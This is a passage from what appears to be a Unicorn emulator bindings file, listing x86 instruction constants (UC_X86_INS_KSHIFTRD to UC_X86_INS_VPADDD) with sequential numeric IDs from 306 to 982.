UC_X86_INS_KSHIFTRD = 306 +' UC_X86_INS_KSHIFTRQ = 307 +' UC_X86_INS_KSHIFTRW = 308 +' UC_X86_INS_KUNPCKBW = 309 +' UC_X86_INS_KXNORB = 310 +' UC_X86_INS_KXNORD = 311 +' UC_X86_INS_KXNORQ = 312 +' UC_X86_INS_KXNORW = 313 +' UC_X86_INS_KXORB = 314 +' UC_X86_INS_KXORD = 315 +' UC_X86_INS_KXORQ = 316 +' UC_X86_INS_KXORW = 317 +' UC_X86_INS_LAHF = 318 +' UC_X86_INS_LAR = 319 +' UC_X86_INS_LDDQU = 320 +' UC_X86_INS_LDMXCSR = 321 +' UC_X86_INS_LDS = 322 +' UC_X86_INS_FLDZ = 323 +' UC_X86_INS_FLD1 = 324 +' UC_X86_INS_FLD = 325 +' UC_X86_INS_LEA = 326 +' UC_X86_INS_LEAVE = 327 +' UC_X86_INS_LES = 328 +' UC_X86_INS_LFENCE = 329 +' UC_X86_INS_LFS = 330 +' UC_X86_INS_LGDT = 331 +' UC_X86_INS_LGS = 332 +' UC_X86_INS_LIDT = 333 +' UC_X86_INS_LLDT = 334 +' UC_X86_INS_LMSW = 335 +' UC_X86_INS_OR = 336 +' UC_X86_INS_SUB = 337 +' UC_X86_INS_XOR = 338 +' UC_X86_INS_LODSB = 339 +' UC_X86_INS_LODSD = 340 +' UC_X86_INS_LODSQ = 341 +' UC_X86_INS_LODSW = 342 +' UC_X86_INS_LOOP = 343 +' UC_X86_INS_LOOPE = 344 +' UC_X86_INS_LOOPNE = 345 +' UC_X86_INS_RETF = 346 +' UC_X86_INS_RETFQ = 347 +' UC_X86_INS_LSL = 348 +' UC_X86_INS_LSS = 
349 +' UC_X86_INS_LTR = 350 +' UC_X86_INS_XADD = 351 +' UC_X86_INS_LZCNT = 352 +' UC_X86_INS_MASKMOVDQU = 353 +' UC_X86_INS_MAXPD = 354 +' UC_X86_INS_MAXPS = 355 +' UC_X86_INS_MAXSD = 356 +' UC_X86_INS_MAXSS = 357 +' UC_X86_INS_MFENCE = 358 +' UC_X86_INS_MINPD = 359 +' UC_X86_INS_MINPS = 360 +' UC_X86_INS_MINSD = 361 +' UC_X86_INS_MINSS = 362 +' UC_X86_INS_CVTPD2PI = 363 +' UC_X86_INS_CVTPI2PD = 364 +' UC_X86_INS_CVTPI2PS = 365 +' UC_X86_INS_CVTPS2PI = 366 +' UC_X86_INS_CVTTPD2PI = 367 +' UC_X86_INS_CVTTPS2PI = 368 +' UC_X86_INS_EMMS = 369 +' UC_X86_INS_MASKMOVQ = 370 +' UC_X86_INS_MOVD = 371 +' UC_X86_INS_MOVDQ2Q = 372 +' UC_X86_INS_MOVNTQ = 373 +' UC_X86_INS_MOVQ2DQ = 374 +' UC_X86_INS_MOVQ = 375 +' UC_X86_INS_PABSB = 376 +' UC_X86_INS_PABSD = 377 +' UC_X86_INS_PABSW = 378 +' UC_X86_INS_PACKSSDW = 379 +' UC_X86_INS_PACKSSWB = 380 +' UC_X86_INS_PACKUSWB = 381 +' UC_X86_INS_PADDB = 382 +' UC_X86_INS_PADDD = 383 +' UC_X86_INS_PADDQ = 384 +' UC_X86_INS_PADDSB = 385 +' UC_X86_INS_PADDSW = 386 +' UC_X86_INS_PADDUSB = 387 +' UC_X86_INS_PADDUSW = 388 +' UC_X86_INS_PADDW = 389 +' UC_X86_INS_PALIGNR = 390 +' UC_X86_INS_PANDN = 391 +' UC_X86_INS_PAND = 392 +' UC_X86_INS_PAVGB = 393 +' UC_X86_INS_PAVGW = 394 +' UC_X86_INS_PCMPEQB = 395 +' UC_X86_INS_PCMPEQD = 396 +' UC_X86_INS_PCMPEQW = 397 +' UC_X86_INS_PCMPGTB = 398 +' UC_X86_INS_PCMPGTD = 399 +' UC_X86_INS_PCMPGTW = 400 +' UC_X86_INS_PEXTRW = 401 +' UC_X86_INS_PHADDSW = 402 +' UC_X86_INS_PHADDW = 403 +' UC_X86_INS_PHADDD = 404 +' UC_X86_INS_PHSUBD = 405 +' UC_X86_INS_PHSUBSW = 406 +' UC_X86_INS_PHSUBW = 407 +' UC_X86_INS_PINSRW = 408 +' UC_X86_INS_PMADDUBSW = 409 +' UC_X86_INS_PMADDWD = 410 +' UC_X86_INS_PMAXSW = 411 +' UC_X86_INS_PMAXUB = 412 +' UC_X86_INS_PMINSW = 413 +' UC_X86_INS_PMINUB = 414 +' UC_X86_INS_PMOVMSKB = 415 +' UC_X86_INS_PMULHRSW = 416 +' UC_X86_INS_PMULHUW = 417 +' UC_X86_INS_PMULHW = 418 +' UC_X86_INS_PMULLW = 419 +' UC_X86_INS_PMULUDQ = 420 +' UC_X86_INS_POR = 421 +' UC_X86_INS_PSADBW = 422 +' 
UC_X86_INS_PSHUFB = 423 +' UC_X86_INS_PSHUFW = 424 +' UC_X86_INS_PSIGNB = 425 +' UC_X86_INS_PSIGND = 426 +' UC_X86_INS_PSIGNW = 427 +' UC_X86_INS_PSLLD = 428 +' UC_X86_INS_PSLLQ = 429 +' UC_X86_INS_PSLLW = 430 +' UC_X86_INS_PSRAD = 431 +' UC_X86_INS_PSRAW = 432 +' UC_X86_INS_PSRLD = 433 +' UC_X86_INS_PSRLQ = 434 +' UC_X86_INS_PSRLW = 435 +' UC_X86_INS_PSUBB = 436 +' UC_X86_INS_PSUBD = 437 +' UC_X86_INS_PSUBQ = 438 +' UC_X86_INS_PSUBSB = 439 +' UC_X86_INS_PSUBSW = 440 +' UC_X86_INS_PSUBUSB = 441 +' UC_X86_INS_PSUBUSW = 442 +' UC_X86_INS_PSUBW = 443 +' UC_X86_INS_PUNPCKHBW = 444 +' UC_X86_INS_PUNPCKHDQ = 445 +' UC_X86_INS_PUNPCKHWD = 446 +' UC_X86_INS_PUNPCKLBW = 447 +' UC_X86_INS_PUNPCKLDQ = 448 +' UC_X86_INS_PUNPCKLWD = 449 +' UC_X86_INS_PXOR = 450 +' UC_X86_INS_MONITOR = 451 +' UC_X86_INS_MONTMUL = 452 +' UC_X86_INS_MOV = 453 +' UC_X86_INS_MOVABS = 454 +' UC_X86_INS_MOVBE = 455 +' UC_X86_INS_MOVDDUP = 456 +' UC_X86_INS_MOVDQA = 457 +' UC_X86_INS_MOVDQU = 458 +' UC_X86_INS_MOVHLPS = 459 +' UC_X86_INS_MOVHPD = 460 +' UC_X86_INS_MOVHPS = 461 +' UC_X86_INS_MOVLHPS = 462 +' UC_X86_INS_MOVLPD = 463 +' UC_X86_INS_MOVLPS = 464 +' UC_X86_INS_MOVMSKPD = 465 +' UC_X86_INS_MOVMSKPS = 466 +' UC_X86_INS_MOVNTDQA = 467 +' UC_X86_INS_MOVNTDQ = 468 +' UC_X86_INS_MOVNTI = 469 +' UC_X86_INS_MOVNTPD = 470 +' UC_X86_INS_MOVNTPS = 471 +' UC_X86_INS_MOVNTSD = 472 +' UC_X86_INS_MOVNTSS = 473 +' UC_X86_INS_MOVSB = 474 +' UC_X86_INS_MOVSD = 475 +' UC_X86_INS_MOVSHDUP = 476 +' UC_X86_INS_MOVSLDUP = 477 +' UC_X86_INS_MOVSQ = 478 +' UC_X86_INS_MOVSS = 479 +' UC_X86_INS_MOVSW = 480 +' UC_X86_INS_MOVSX = 481 +' UC_X86_INS_MOVSXD = 482 +' UC_X86_INS_MOVUPD = 483 +' UC_X86_INS_MOVUPS = 484 +' UC_X86_INS_MOVZX = 485 +' UC_X86_INS_MPSADBW = 486 +' UC_X86_INS_MUL = 487 +' UC_X86_INS_MULPD = 488 +' UC_X86_INS_MULPS = 489 +' UC_X86_INS_MULSD = 490 +' UC_X86_INS_MULSS = 491 +' UC_X86_INS_MULX = 492 +' UC_X86_INS_FMUL = 493 +' UC_X86_INS_FIMUL = 494 +' UC_X86_INS_FMULP = 495 +' UC_X86_INS_MWAIT = 496 +' 
UC_X86_INS_NEG = 497 +' UC_X86_INS_NOP = 498 +' UC_X86_INS_NOT = 499 +' UC_X86_INS_OUT = 500 +' UC_X86_INS_OUTSB = 501 +' UC_X86_INS_OUTSD = 502 +' UC_X86_INS_OUTSW = 503 +' UC_X86_INS_PACKUSDW = 504 +' UC_X86_INS_PAUSE = 505 +' UC_X86_INS_PAVGUSB = 506 +' UC_X86_INS_PBLENDVB = 507 +' UC_X86_INS_PBLENDW = 508 +' UC_X86_INS_PCLMULQDQ = 509 +' UC_X86_INS_PCMPEQQ = 510 +' UC_X86_INS_PCMPESTRI = 511 +' UC_X86_INS_PCMPESTRM = 512 +' UC_X86_INS_PCMPGTQ = 513 +' UC_X86_INS_PCMPISTRI = 514 +' UC_X86_INS_PCMPISTRM = 515 +' UC_X86_INS_PCOMMIT = 516 +' UC_X86_INS_PDEP = 517 +' UC_X86_INS_PEXT = 518 +' UC_X86_INS_PEXTRB = 519 +' UC_X86_INS_PEXTRD = 520 +' UC_X86_INS_PEXTRQ = 521 +' UC_X86_INS_PF2ID = 522 +' UC_X86_INS_PF2IW = 523 +' UC_X86_INS_PFACC = 524 +' UC_X86_INS_PFADD = 525 +' UC_X86_INS_PFCMPEQ = 526 +' UC_X86_INS_PFCMPGE = 527 +' UC_X86_INS_PFCMPGT = 528 +' UC_X86_INS_PFMAX = 529 +' UC_X86_INS_PFMIN = 530 +' UC_X86_INS_PFMUL = 531 +' UC_X86_INS_PFNACC = 532 +' UC_X86_INS_PFPNACC = 533 +' UC_X86_INS_PFRCPIT1 = 534 +' UC_X86_INS_PFRCPIT2 = 535 +' UC_X86_INS_PFRCP = 536 +' UC_X86_INS_PFRSQIT1 = 537 +' UC_X86_INS_PFRSQRT = 538 +' UC_X86_INS_PFSUBR = 539 +' UC_X86_INS_PFSUB = 540 +' UC_X86_INS_PHMINPOSUW = 541 +' UC_X86_INS_PI2FD = 542 +' UC_X86_INS_PI2FW = 543 +' UC_X86_INS_PINSRB = 544 +' UC_X86_INS_PINSRD = 545 +' UC_X86_INS_PINSRQ = 546 +' UC_X86_INS_PMAXSB = 547 +' UC_X86_INS_PMAXSD = 548 +' UC_X86_INS_PMAXUD = 549 +' UC_X86_INS_PMAXUW = 550 +' UC_X86_INS_PMINSB = 551 +' UC_X86_INS_PMINSD = 552 +' UC_X86_INS_PMINUD = 553 +' UC_X86_INS_PMINUW = 554 +' UC_X86_INS_PMOVSXBD = 555 +' UC_X86_INS_PMOVSXBQ = 556 +' UC_X86_INS_PMOVSXBW = 557 +' UC_X86_INS_PMOVSXDQ = 558 +' UC_X86_INS_PMOVSXWD = 559 +' UC_X86_INS_PMOVSXWQ = 560 +' UC_X86_INS_PMOVZXBD = 561 +' UC_X86_INS_PMOVZXBQ = 562 +' UC_X86_INS_PMOVZXBW = 563 +' UC_X86_INS_PMOVZXDQ = 564 +' UC_X86_INS_PMOVZXWD = 565 +' UC_X86_INS_PMOVZXWQ = 566 +' UC_X86_INS_PMULDQ = 567 +' UC_X86_INS_PMULHRW = 568 +' UC_X86_INS_PMULLD = 
569 +' UC_X86_INS_POP = 570 +' UC_X86_INS_POPAW = 571 +' UC_X86_INS_POPAL = 572 +' UC_X86_INS_POPCNT = 573 +' UC_X86_INS_POPF = 574 +' UC_X86_INS_POPFD = 575 +' UC_X86_INS_POPFQ = 576 +' UC_X86_INS_PREFETCH = 577 +' UC_X86_INS_PREFETCHNTA = 578 +' UC_X86_INS_PREFETCHT0 = 579 +' UC_X86_INS_PREFETCHT1 = 580 +' UC_X86_INS_PREFETCHT2 = 581 +' UC_X86_INS_PREFETCHW = 582 +' UC_X86_INS_PSHUFD = 583 +' UC_X86_INS_PSHUFHW = 584 +' UC_X86_INS_PSHUFLW = 585 +' UC_X86_INS_PSLLDQ = 586 +' UC_X86_INS_PSRLDQ = 587 +' UC_X86_INS_PSWAPD = 588 +' UC_X86_INS_PTEST = 589 +' UC_X86_INS_PUNPCKHQDQ = 590 +' UC_X86_INS_PUNPCKLQDQ = 591 +' UC_X86_INS_PUSH = 592 +' UC_X86_INS_PUSHAW = 593 +' UC_X86_INS_PUSHAL = 594 +' UC_X86_INS_PUSHF = 595 +' UC_X86_INS_PUSHFD = 596 +' UC_X86_INS_PUSHFQ = 597 +' UC_X86_INS_RCL = 598 +' UC_X86_INS_RCPPS = 599 +' UC_X86_INS_RCPSS = 600 +' UC_X86_INS_RCR = 601 +' UC_X86_INS_RDFSBASE = 602 +' UC_X86_INS_RDGSBASE = 603 +' UC_X86_INS_RDMSR = 604 +' UC_X86_INS_RDPMC = 605 +' UC_X86_INS_RDRAND = 606 +' UC_X86_INS_RDSEED = 607 +' UC_X86_INS_RDTSC = 608 +' UC_X86_INS_RDTSCP = 609 +' UC_X86_INS_ROL = 610 +' UC_X86_INS_ROR = 611 +' UC_X86_INS_RORX = 612 +' UC_X86_INS_ROUNDPD = 613 +' UC_X86_INS_ROUNDPS = 614 +' UC_X86_INS_ROUNDSD = 615 +' UC_X86_INS_ROUNDSS = 616 +' UC_X86_INS_RSM = 617 +' UC_X86_INS_RSQRTPS = 618 +' UC_X86_INS_RSQRTSS = 619 +' UC_X86_INS_SAHF = 620 +' UC_X86_INS_SAL = 621 +' UC_X86_INS_SALC = 622 +' UC_X86_INS_SAR = 623 +' UC_X86_INS_SARX = 624 +' UC_X86_INS_SBB = 625 +' UC_X86_INS_SCASB = 626 +' UC_X86_INS_SCASD = 627 +' UC_X86_INS_SCASQ = 628 +' UC_X86_INS_SCASW = 629 +' UC_X86_INS_SETAE = 630 +' UC_X86_INS_SETA = 631 +' UC_X86_INS_SETBE = 632 +' UC_X86_INS_SETB = 633 +' UC_X86_INS_SETE = 634 +' UC_X86_INS_SETGE = 635 +' UC_X86_INS_SETG = 636 +' UC_X86_INS_SETLE = 637 +' UC_X86_INS_SETL = 638 +' UC_X86_INS_SETNE = 639 +' UC_X86_INS_SETNO = 640 +' UC_X86_INS_SETNP = 641 +' UC_X86_INS_SETNS = 642 +' UC_X86_INS_SETO = 643 +' UC_X86_INS_SETP = 644 +' 
UC_X86_INS_SETS = 645 +' UC_X86_INS_SFENCE = 646 +' UC_X86_INS_SGDT = 647 +' UC_X86_INS_SHA1MSG1 = 648 +' UC_X86_INS_SHA1MSG2 = 649 +' UC_X86_INS_SHA1NEXTE = 650 +' UC_X86_INS_SHA1RNDS4 = 651 +' UC_X86_INS_SHA256MSG1 = 652 +' UC_X86_INS_SHA256MSG2 = 653 +' UC_X86_INS_SHA256RNDS2 = 654 +' UC_X86_INS_SHL = 655 +' UC_X86_INS_SHLD = 656 +' UC_X86_INS_SHLX = 657 +' UC_X86_INS_SHR = 658 +' UC_X86_INS_SHRD = 659 +' UC_X86_INS_SHRX = 660 +' UC_X86_INS_SHUFPD = 661 +' UC_X86_INS_SHUFPS = 662 +' UC_X86_INS_SIDT = 663 +' UC_X86_INS_FSIN = 664 +' UC_X86_INS_SKINIT = 665 +' UC_X86_INS_SLDT = 666 +' UC_X86_INS_SMSW = 667 +' UC_X86_INS_SQRTPD = 668 +' UC_X86_INS_SQRTPS = 669 +' UC_X86_INS_SQRTSD = 670 +' UC_X86_INS_SQRTSS = 671 +' UC_X86_INS_FSQRT = 672 +' UC_X86_INS_STAC = 673 +' UC_X86_INS_STC = 674 +' UC_X86_INS_STD = 675 +' UC_X86_INS_STGI = 676 +' UC_X86_INS_STI = 677 +' UC_X86_INS_STMXCSR = 678 +' UC_X86_INS_STOSB = 679 +' UC_X86_INS_STOSD = 680 +' UC_X86_INS_STOSQ = 681 +' UC_X86_INS_STOSW = 682 +' UC_X86_INS_STR = 683 +' UC_X86_INS_FST = 684 +' UC_X86_INS_FSTP = 685 +' UC_X86_INS_FSTPNCE = 686 +' UC_X86_INS_FXCH = 687 +' UC_X86_INS_SUBPD = 688 +' UC_X86_INS_SUBPS = 689 +' UC_X86_INS_FSUBR = 690 +' UC_X86_INS_FISUBR = 691 +' UC_X86_INS_FSUBRP = 692 +' UC_X86_INS_SUBSD = 693 +' UC_X86_INS_SUBSS = 694 +' UC_X86_INS_FSUB = 695 +' UC_X86_INS_FISUB = 696 +' UC_X86_INS_FSUBP = 697 +' UC_X86_INS_SWAPGS = 698 +' UC_X86_INS_SYSCALL = 699 +' UC_X86_INS_SYSENTER = 700 +' UC_X86_INS_SYSEXIT = 701 +' UC_X86_INS_SYSRET = 702 +' UC_X86_INS_T1MSKC = 703 +' UC_X86_INS_TEST = 704 +' UC_X86_INS_UD2 = 705 +' UC_X86_INS_FTST = 706 +' UC_X86_INS_TZCNT = 707 +' UC_X86_INS_TZMSK = 708 +' UC_X86_INS_FUCOMPI = 709 +' UC_X86_INS_FUCOMI = 710 +' UC_X86_INS_FUCOMPP = 711 +' UC_X86_INS_FUCOMP = 712 +' UC_X86_INS_FUCOM = 713 +' UC_X86_INS_UD2B = 714 +' UC_X86_INS_UNPCKHPD = 715 +' UC_X86_INS_UNPCKHPS = 716 +' UC_X86_INS_UNPCKLPD = 717 +' UC_X86_INS_UNPCKLPS = 718 +' UC_X86_INS_VADDPD = 719 +' 
UC_X86_INS_VADDPS = 720 +' UC_X86_INS_VADDSD = 721 +' UC_X86_INS_VADDSS = 722 +' UC_X86_INS_VADDSUBPD = 723 +' UC_X86_INS_VADDSUBPS = 724 +' UC_X86_INS_VAESDECLAST = 725 +' UC_X86_INS_VAESDEC = 726 +' UC_X86_INS_VAESENCLAST = 727 +' UC_X86_INS_VAESENC = 728 +' UC_X86_INS_VAESIMC = 729 +' UC_X86_INS_VAESKEYGENASSIST = 730 +' UC_X86_INS_VALIGND = 731 +' UC_X86_INS_VALIGNQ = 732 +' UC_X86_INS_VANDNPD = 733 +' UC_X86_INS_VANDNPS = 734 +' UC_X86_INS_VANDPD = 735 +' UC_X86_INS_VANDPS = 736 +' UC_X86_INS_VBLENDMPD = 737 +' UC_X86_INS_VBLENDMPS = 738 +' UC_X86_INS_VBLENDPD = 739 +' UC_X86_INS_VBLENDPS = 740 +' UC_X86_INS_VBLENDVPD = 741 +' UC_X86_INS_VBLENDVPS = 742 +' UC_X86_INS_VBROADCASTF128 = 743 +' UC_X86_INS_VBROADCASTI32X4 = 744 +' UC_X86_INS_VBROADCASTI64X4 = 745 +' UC_X86_INS_VBROADCASTSD = 746 +' UC_X86_INS_VBROADCASTSS = 747 +' UC_X86_INS_VCMPPD = 748 +' UC_X86_INS_VCMPPS = 749 +' UC_X86_INS_VCMPSD = 750 +' UC_X86_INS_VCMPSS = 751 +' UC_X86_INS_VCOMPRESSPD = 752 +' UC_X86_INS_VCOMPRESSPS = 753 +' UC_X86_INS_VCVTDQ2PD = 754 +' UC_X86_INS_VCVTDQ2PS = 755 +' UC_X86_INS_VCVTPD2DQX = 756 +' UC_X86_INS_VCVTPD2DQ = 757 +' UC_X86_INS_VCVTPD2PSX = 758 +' UC_X86_INS_VCVTPD2PS = 759 +' UC_X86_INS_VCVTPD2UDQ = 760 +' UC_X86_INS_VCVTPH2PS = 761 +' UC_X86_INS_VCVTPS2DQ = 762 +' UC_X86_INS_VCVTPS2PD = 763 +' UC_X86_INS_VCVTPS2PH = 764 +' UC_X86_INS_VCVTPS2UDQ = 765 +' UC_X86_INS_VCVTSD2SI = 766 +' UC_X86_INS_VCVTSD2USI = 767 +' UC_X86_INS_VCVTSS2SI = 768 +' UC_X86_INS_VCVTSS2USI = 769 +' UC_X86_INS_VCVTTPD2DQX = 770 +' UC_X86_INS_VCVTTPD2DQ = 771 +' UC_X86_INS_VCVTTPD2UDQ = 772 +' UC_X86_INS_VCVTTPS2DQ = 773 +' UC_X86_INS_VCVTTPS2UDQ = 774 +' UC_X86_INS_VCVTUDQ2PD = 775 +' UC_X86_INS_VCVTUDQ2PS = 776 +' UC_X86_INS_VDIVPD = 777 +' UC_X86_INS_VDIVPS = 778 +' UC_X86_INS_VDIVSD = 779 +' UC_X86_INS_VDIVSS = 780 +' UC_X86_INS_VDPPD = 781 +' UC_X86_INS_VDPPS = 782 +' UC_X86_INS_VERR = 783 +' UC_X86_INS_VERW = 784 +' UC_X86_INS_VEXP2PD = 785 +' UC_X86_INS_VEXP2PS = 786 +' 
UC_X86_INS_VEXPANDPD = 787 +' UC_X86_INS_VEXPANDPS = 788 +' UC_X86_INS_VEXTRACTF128 = 789 +' UC_X86_INS_VEXTRACTF32X4 = 790 +' UC_X86_INS_VEXTRACTF64X4 = 791 +' UC_X86_INS_VEXTRACTI128 = 792 +' UC_X86_INS_VEXTRACTI32X4 = 793 +' UC_X86_INS_VEXTRACTI64X4 = 794 +' UC_X86_INS_VEXTRACTPS = 795 +' UC_X86_INS_VFMADD132PD = 796 +' UC_X86_INS_VFMADD132PS = 797 +' UC_X86_INS_VFMADDPD = 798 +' UC_X86_INS_VFMADD213PD = 799 +' UC_X86_INS_VFMADD231PD = 800 +' UC_X86_INS_VFMADDPS = 801 +' UC_X86_INS_VFMADD213PS = 802 +' UC_X86_INS_VFMADD231PS = 803 +' UC_X86_INS_VFMADDSD = 804 +' UC_X86_INS_VFMADD213SD = 805 +' UC_X86_INS_VFMADD132SD = 806 +' UC_X86_INS_VFMADD231SD = 807 +' UC_X86_INS_VFMADDSS = 808 +' UC_X86_INS_VFMADD213SS = 809 +' UC_X86_INS_VFMADD132SS = 810 +' UC_X86_INS_VFMADD231SS = 811 +' UC_X86_INS_VFMADDSUB132PD = 812 +' UC_X86_INS_VFMADDSUB132PS = 813 +' UC_X86_INS_VFMADDSUBPD = 814 +' UC_X86_INS_VFMADDSUB213PD = 815 +' UC_X86_INS_VFMADDSUB231PD = 816 +' UC_X86_INS_VFMADDSUBPS = 817 +' UC_X86_INS_VFMADDSUB213PS = 818 +' UC_X86_INS_VFMADDSUB231PS = 819 +' UC_X86_INS_VFMSUB132PD = 820 +' UC_X86_INS_VFMSUB132PS = 821 +' UC_X86_INS_VFMSUBADD132PD = 822 +' UC_X86_INS_VFMSUBADD132PS = 823 +' UC_X86_INS_VFMSUBADDPD = 824 +' UC_X86_INS_VFMSUBADD213PD = 825 +' UC_X86_INS_VFMSUBADD231PD = 826 +' UC_X86_INS_VFMSUBADDPS = 827 +' UC_X86_INS_VFMSUBADD213PS = 828 +' UC_X86_INS_VFMSUBADD231PS = 829 +' UC_X86_INS_VFMSUBPD = 830 +' UC_X86_INS_VFMSUB213PD = 831 +' UC_X86_INS_VFMSUB231PD = 832 +' UC_X86_INS_VFMSUBPS = 833 +' UC_X86_INS_VFMSUB213PS = 834 +' UC_X86_INS_VFMSUB231PS = 835 +' UC_X86_INS_VFMSUBSD = 836 +' UC_X86_INS_VFMSUB213SD = 837 +' UC_X86_INS_VFMSUB132SD = 838 +' UC_X86_INS_VFMSUB231SD = 839 +' UC_X86_INS_VFMSUBSS = 840 +' UC_X86_INS_VFMSUB213SS = 841 +' UC_X86_INS_VFMSUB132SS = 842 +' UC_X86_INS_VFMSUB231SS = 843 +' UC_X86_INS_VFNMADD132PD = 844 +' UC_X86_INS_VFNMADD132PS = 845 +' UC_X86_INS_VFNMADDPD = 846 +' UC_X86_INS_VFNMADD213PD = 847 +' UC_X86_INS_VFNMADD231PD = 848 
+' UC_X86_INS_VFNMADDPS = 849 +' UC_X86_INS_VFNMADD213PS = 850 +' UC_X86_INS_VFNMADD231PS = 851 +' UC_X86_INS_VFNMADDSD = 852 +' UC_X86_INS_VFNMADD213SD = 853 +' UC_X86_INS_VFNMADD132SD = 854 +' UC_X86_INS_VFNMADD231SD = 855 +' UC_X86_INS_VFNMADDSS = 856 +' UC_X86_INS_VFNMADD213SS = 857 +' UC_X86_INS_VFNMADD132SS = 858 +' UC_X86_INS_VFNMADD231SS = 859 +' UC_X86_INS_VFNMSUB132PD = 860 +' UC_X86_INS_VFNMSUB132PS = 861 +' UC_X86_INS_VFNMSUBPD = 862 +' UC_X86_INS_VFNMSUB213PD = 863 +' UC_X86_INS_VFNMSUB231PD = 864 +' UC_X86_INS_VFNMSUBPS = 865 +' UC_X86_INS_VFNMSUB213PS = 866 +' UC_X86_INS_VFNMSUB231PS = 867 +' UC_X86_INS_VFNMSUBSD = 868 +' UC_X86_INS_VFNMSUB213SD = 869 +' UC_X86_INS_VFNMSUB132SD = 870 +' UC_X86_INS_VFNMSUB231SD = 871 +' UC_X86_INS_VFNMSUBSS = 872 +' UC_X86_INS_VFNMSUB213SS = 873 +' UC_X86_INS_VFNMSUB132SS = 874 +' UC_X86_INS_VFNMSUB231SS = 875 +' UC_X86_INS_VFRCZPD = 876 +' UC_X86_INS_VFRCZPS = 877 +' UC_X86_INS_VFRCZSD = 878 +' UC_X86_INS_VFRCZSS = 879 +' UC_X86_INS_VORPD = 880 +' UC_X86_INS_VORPS = 881 +' UC_X86_INS_VXORPD = 882 +' UC_X86_INS_VXORPS = 883 +' UC_X86_INS_VGATHERDPD = 884 +' UC_X86_INS_VGATHERDPS = 885 +' UC_X86_INS_VGATHERPF0DPD = 886 +' UC_X86_INS_VGATHERPF0DPS = 887 +' UC_X86_INS_VGATHERPF0QPD = 888 +' UC_X86_INS_VGATHERPF0QPS = 889 +' UC_X86_INS_VGATHERPF1DPD = 890 +' UC_X86_INS_VGATHERPF1DPS = 891 +' UC_X86_INS_VGATHERPF1QPD = 892 +' UC_X86_INS_VGATHERPF1QPS = 893 +' UC_X86_INS_VGATHERQPD = 894 +' UC_X86_INS_VGATHERQPS = 895 +' UC_X86_INS_VHADDPD = 896 +' UC_X86_INS_VHADDPS = 897 +' UC_X86_INS_VHSUBPD = 898 +' UC_X86_INS_VHSUBPS = 899 +' UC_X86_INS_VINSERTF128 = 900 +' UC_X86_INS_VINSERTF32X4 = 901 +' UC_X86_INS_VINSERTF32X8 = 902 +' UC_X86_INS_VINSERTF64X2 = 903 +' UC_X86_INS_VINSERTF64X4 = 904 +' UC_X86_INS_VINSERTI128 = 905 +' UC_X86_INS_VINSERTI32X4 = 906 +' UC_X86_INS_VINSERTI32X8 = 907 +' UC_X86_INS_VINSERTI64X2 = 908 +' UC_X86_INS_VINSERTI64X4 = 909 +' UC_X86_INS_VINSERTPS = 910 +' UC_X86_INS_VLDDQU = 911 +' 
UC_X86_INS_VLDMXCSR = 912 +' UC_X86_INS_VMASKMOVDQU = 913 +' UC_X86_INS_VMASKMOVPD = 914 +' UC_X86_INS_VMASKMOVPS = 915 +' UC_X86_INS_VMAXPD = 916 +' UC_X86_INS_VMAXPS = 917 +' UC_X86_INS_VMAXSD = 918 +' UC_X86_INS_VMAXSS = 919 +' UC_X86_INS_VMCALL = 920 +' UC_X86_INS_VMCLEAR = 921 +' UC_X86_INS_VMFUNC = 922 +' UC_X86_INS_VMINPD = 923 +' UC_X86_INS_VMINPS = 924 +' UC_X86_INS_VMINSD = 925 +' UC_X86_INS_VMINSS = 926 +' UC_X86_INS_VMLAUNCH = 927 +' UC_X86_INS_VMLOAD = 928 +' UC_X86_INS_VMMCALL = 929 +' UC_X86_INS_VMOVQ = 930 +' UC_X86_INS_VMOVDDUP = 931 +' UC_X86_INS_VMOVD = 932 +' UC_X86_INS_VMOVDQA32 = 933 +' UC_X86_INS_VMOVDQA64 = 934 +' UC_X86_INS_VMOVDQA = 935 +' UC_X86_INS_VMOVDQU16 = 936 +' UC_X86_INS_VMOVDQU32 = 937 +' UC_X86_INS_VMOVDQU64 = 938 +' UC_X86_INS_VMOVDQU8 = 939 +' UC_X86_INS_VMOVDQU = 940 +' UC_X86_INS_VMOVHLPS = 941 +' UC_X86_INS_VMOVHPD = 942 +' UC_X86_INS_VMOVHPS = 943 +' UC_X86_INS_VMOVLHPS = 944 +' UC_X86_INS_VMOVLPD = 945 +' UC_X86_INS_VMOVLPS = 946 +' UC_X86_INS_VMOVMSKPD = 947 +' UC_X86_INS_VMOVMSKPS = 948 +' UC_X86_INS_VMOVNTDQA = 949 +' UC_X86_INS_VMOVNTDQ = 950 +' UC_X86_INS_VMOVNTPD = 951 +' UC_X86_INS_VMOVNTPS = 952 +' UC_X86_INS_VMOVSD = 953 +' UC_X86_INS_VMOVSHDUP = 954 +' UC_X86_INS_VMOVSLDUP = 955 +' UC_X86_INS_VMOVSS = 956 +' UC_X86_INS_VMOVUPD = 957 +' UC_X86_INS_VMOVUPS = 958 +' UC_X86_INS_VMPSADBW = 959 +' UC_X86_INS_VMPTRLD = 960 +' UC_X86_INS_VMPTRST = 961 +' UC_X86_INS_VMREAD = 962 +' UC_X86_INS_VMRESUME = 963 +' UC_X86_INS_VMRUN = 964 +' UC_X86_INS_VMSAVE = 965 +' UC_X86_INS_VMULPD = 966 +' UC_X86_INS_VMULPS = 967 +' UC_X86_INS_VMULSD = 968 +' UC_X86_INS_VMULSS = 969 +' UC_X86_INS_VMWRITE = 970 +' UC_X86_INS_VMXOFF = 971 +' UC_X86_INS_VMXON = 972 +' UC_X86_INS_VPABSB = 973 +' UC_X86_INS_VPABSD = 974 +' UC_X86_INS_VPABSQ = 975 +' UC_X86_INS_VPABSW = 976 +' UC_X86_INS_VPACKSSDW = 977 +' UC_X86_INS_VPACKSSWB = 978 +' UC_X86_INS_VPACKUSDW = 979 +' UC_X86_INS_VPACKUSWB = 980 +' UC_X86_INS_VPADDB = 981 +' UC_X86_INS_VPADDD = 982 
